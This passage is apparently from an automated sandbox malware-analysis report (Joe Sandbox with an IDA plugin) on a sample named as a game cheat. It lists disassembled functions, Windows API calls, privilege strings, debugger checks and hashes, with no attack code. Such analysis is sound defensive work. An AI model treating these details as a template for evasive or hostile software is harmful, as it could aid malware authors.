                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D0C358
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00D0C36E
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D0C38C
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D0C39C
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D0C3B8
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D0C3D4
                                                    • _swprintf.LIBCMT ref: 00D0C404
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D0C417
                                                    • FindClose.KERNEL32(00000000), ref: 00D0C41E
                                                    • _swprintf.LIBCMT ref: 00D0C477
                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D0C48A
                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D0C4A7
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D0C4C7
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D0C4D7
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D0C4F1
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D0C509
                                                    • _swprintf.LIBCMT ref: 00D0C535
                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D0C548
                                                    • _swprintf.LIBCMT ref: 00D0C59C
                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D0C5AF
                                                      • Part of subcall function 00D0AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D0AF35
                                                      • Part of subcall function 00D0AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D2E72C,?,?), ref: 00D0AF84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                    • API String ID: 797121971-1840816070
                                                    • Opcode ID: b67e295caacd1e5135b5eaee3d21a21bcebccf27fd095345a74e7e93c7be7023
                                                    • Instruction ID: 573bbcfba44687935ede7e4477465a91ffd9bdc27d3b74fd348729c6a1663cb1
                                                    • Opcode Fuzzy Hash: b67e295caacd1e5135b5eaee3d21a21bcebccf27fd095345a74e7e93c7be7023
                                                    • Instruction Fuzzy Hash: D3919172648348BBE2319BB0DD49FFB77ACEB4A740F044919B789D21C1D775AA048B72
                                                    Function 00CF6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF6FAA
                                                    • _wcslen.LIBCMT ref: 00CF7013
                                                    • _wcslen.LIBCMT ref: 00CF7084
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                      • Part of subcall function 00CFA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641,000000FF), ref: 00CFA1F1
                                                      • Part of subcall function 00CFA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641), ref: 00CFA21F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CF7139
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CF7155
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CF7298
                                                      • Part of subcall function 00CF9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CF73BC,?,?,?,00000000), ref: 00CF9DBC
                                                      • Part of subcall function 00CF9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CF9E70
                                                      • Part of subcall function 00CF9620: CloseHandle.KERNELBASE(000000FF,?,?,00CF95D6,?,?,?,?,?,00D22641,000000FF), ref: 00CF963B
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3983180755-3508440684
                                                    • Opcode ID: f886815440082bbe122681a96e772b1a6c9093aa31fe8b3e97407c8009b6fba9
                                                    • Instruction ID: ad45a2b4ec5f88721200b2416d6a11177877e24beae07d5dad56b75243cfae4a
                                                    • Opcode Fuzzy Hash: f886815440082bbe122681a96e772b1a6c9093aa31fe8b3e97407c8009b6fba9
                                                    • Instruction Fuzzy Hash: 52C1D871904209AADB65DB74DC41FFEB7A8EF04300F004659FA5AE3281D734AB489B72
                                                    Function 00D1D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 59d40f4c916946154acd0981d218be71cdbf96026cea81c93422aa2c1243e5f3
                                                    • Instruction ID: 49f2f82c6f900a22a07f79fbcff2cfdbae97e563bf5a3019253503824066325e
                                                    • Opcode Fuzzy Hash: 59d40f4c916946154acd0981d218be71cdbf96026cea81c93422aa2c1243e5f3
                                                    • Instruction Fuzzy Hash: 26C22B71E086289FDB25CE28ED407E9B7B5EB44305F1941EAD84DE7241EB74AEC18F60
                                                    Function 00CF32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_swprintf
                                                    • String ID: CMT$h%u$hc%u
                                                    • API String ID: 146138363-3282847064
                                                    • Opcode ID: 6ea5bd27be7c4901f72837205c41fe618008749038511e15378fa17b70583fa7
                                                    • Instruction ID: bbe9fd770e4afef962404612194b1d53d99bde2af8c8146056ff3ab14bd1aed6
                                                    • Opcode Fuzzy Hash: 6ea5bd27be7c4901f72837205c41fe618008749038511e15378fa17b70583fa7
                                                    • Instruction Fuzzy Hash: 6D32C57161028CAFDF58DF74C895AF93BA5AF14300F04047DFE9A8B282DB749649CB22
                                                    Function 00CF286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF2874
                                                    • _strlen.LIBCMT ref: 00CF2E3F
                                                      • Part of subcall function 00D002BA: __EH_prolog.LIBCMT ref: 00D002BF
                                                      • Part of subcall function 00D01B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CFBAE9,00000000,?,?,?,000103DE), ref: 00D01BA0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF2F91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                    • String ID: CMT
                                                    • API String ID: 1206968400-2756464174
                                                    • Opcode ID: 298449f2003846b2ece95ca19a01edeb9e25ae730fc2ac26d863cdf6a0c3dc54
                                                    • Instruction ID: f1325ccb5aee704ca8466af2cb2c8dc3dad17a2e8a1dc7a1d83afc2297d1bef1
                                                    • Opcode Fuzzy Hash: 298449f2003846b2ece95ca19a01edeb9e25ae730fc2ac26d863cdf6a0c3dc54
                                                    • Instruction Fuzzy Hash: E7624B716002899FDB59DF34C8857FA37A1EF54300F08447EEEAA8B382DB759A45CB61
                                                    Function 00D0F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D0F844
                                                    • IsDebuggerPresent.KERNEL32 ref: 00D0F910
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0F930
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D0F93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: a6aed74fb86abbf80201d1d990503aacd216e9d70ec3ae5ad003e59bcb15318a
                                                    • Instruction ID: 8d69fd5107765838bd3b0451dbb8e55793edea30875ddb7545b3542b722743e8
                                                    • Opcode Fuzzy Hash: a6aed74fb86abbf80201d1d990503aacd216e9d70ec3ae5ad003e59bcb15318a
                                                    • Instruction Fuzzy Hash: 23312B75D053199BDB21DFA4D9897CCBBB8AF04304F1040AAE40CA7290EB759B858F65
                                                    Function 00D0E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00D0E5E8,0000001C,00D0E7DD,00000000,?,?,?,?,?,?,?,00D0E5E8,00000004,00D51CEC,00D0E86D), ref: 00D0E6B4
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D0E5E8,00000004,00D51CEC,00D0E86D), ref: 00D0E6CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: d211da5e1d214f1a4c34864b5bce055308a2606af67cba0926b2327837c713d5
                                                    • Instruction ID: aea2c25d773e33709ab901d32e3ed198d4fe3945d566ef51a01b3f1b8ca52265
                                                    • Opcode Fuzzy Hash: d211da5e1d214f1a4c34864b5bce055308a2606af67cba0926b2327837c713d5
                                                    • Instruction Fuzzy Hash: D8012032600209ABDF14DE15DC09BDD7BAAEFC4324F0CC520ED1DD7250D638D9158690
                                                    Function 00D18EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D18FB5
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D18FBF
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D18FCC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: dafcb5bf0cebdaa1ec095857389136ef21e085999a8224d51f00b14f441b0e9d
                                                    • Instruction ID: 6e1be34732bf5906f539d0dc47ced7aa761c949e0b8b3c584a6fbb8c37cb7623
                                                    • Opcode Fuzzy Hash: dafcb5bf0cebdaa1ec095857389136ef21e085999a8224d51f00b14f441b0e9d
                                                    • Instruction Fuzzy Hash: 9931D774941319ABCB21DF24D8897DDBBB4EF08310F6041EAE41CA7290EB709F858F65
                                                    Function 00D1B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: a92fa7b44132adf4a60e689ad1ccc0ce19e29819a87cf443c22c575326906e26
                                                    • Instruction ID: 9b741ebe353f445266c4dc0707e520abae4dfbe427b9c769d08374589bfeccd8
                                                    • Opcode Fuzzy Hash: a92fa7b44132adf4a60e689ad1ccc0ce19e29819a87cf443c22c575326906e26
                                                    • Instruction Fuzzy Hash: E331F6719002497BCB249E79EC84EFA7BBDDB45324F1441A9F41897252EB309D858B70
                                                    Function 00D1D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction ID: d15d1baf946bfe123705312f28ca2d67973edb23a0d7238c633bc1bda876977d
                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction Fuzzy Hash: 8A02FE71E00219AFDF14CFA9D9806EDB7F2EF48314F294169D919E7284DB31AD41CBA0
                                                    Function 00D0AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D0AF35
                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D2E72C,?,?), ref: 00D0AF84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleNumber
                                                    • String ID:
                                                    • API String ID: 2169056816-0
                                                    • Opcode ID: 24a2a4f4a81723ce16aa12fa9d29da85c0958fe92247b4aa977b8756e6eeb76d
                                                    • Instruction ID: d4d8b2953d4452bd8f08833e19f0e98bce9d62f0016b26fb96db82a5306146ab
                                                    • Opcode Fuzzy Hash: 24a2a4f4a81723ce16aa12fa9d29da85c0958fe92247b4aa977b8756e6eeb76d
                                                    • Instruction Fuzzy Hash: 57015A3A100308ABD7209F64EC85F9A77B8EF19710F004022FA09E72A1E370A925CBB5
                                                    Function 00CF6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00CF6DDF,00000000,00000400), ref: 00CF6C74
                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CF6C95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 0f6d51b8155edbe595c111858c8a4cd6b2e9aa7e4ef2d2e457b16591d7f4e8c6
                                                    • Instruction ID: cd198ae61d91af42f9499bc8c869306ae763baf023939390e03782014cc0e674
                                                    • Opcode Fuzzy Hash: 0f6d51b8155edbe595c111858c8a4cd6b2e9aa7e4ef2d2e457b16591d7f4e8c6
                                                    • Instruction Fuzzy Hash: C4D0C931344300BFFA650F628E06F2A7B99BF55B91F18C404B795E80E0CA789525A73A
                                                    Function 00D219F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D219EF,?,?,00000008,?,?,00D2168F,00000000), ref: 00D21C21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: c6e2a7295e2f84fe850a03d2cdc901142a1f597657dba547d0044c71d6f4a61b
                                                    • Instruction ID: dc8867adfa0950567c26fc6eeb450473a5741c31d7e58a22f0e473d2be1945da
                                                    • Opcode Fuzzy Hash: c6e2a7295e2f84fe850a03d2cdc901142a1f597657dba547d0044c71d6f4a61b
                                                    • Instruction Fuzzy Hash: 0CB16E392106189FD715CF28D486B65BBE0FF65368F29C658E8D9CF2A1C335E982CB50
                                                    Function 00D0F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D0F66A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
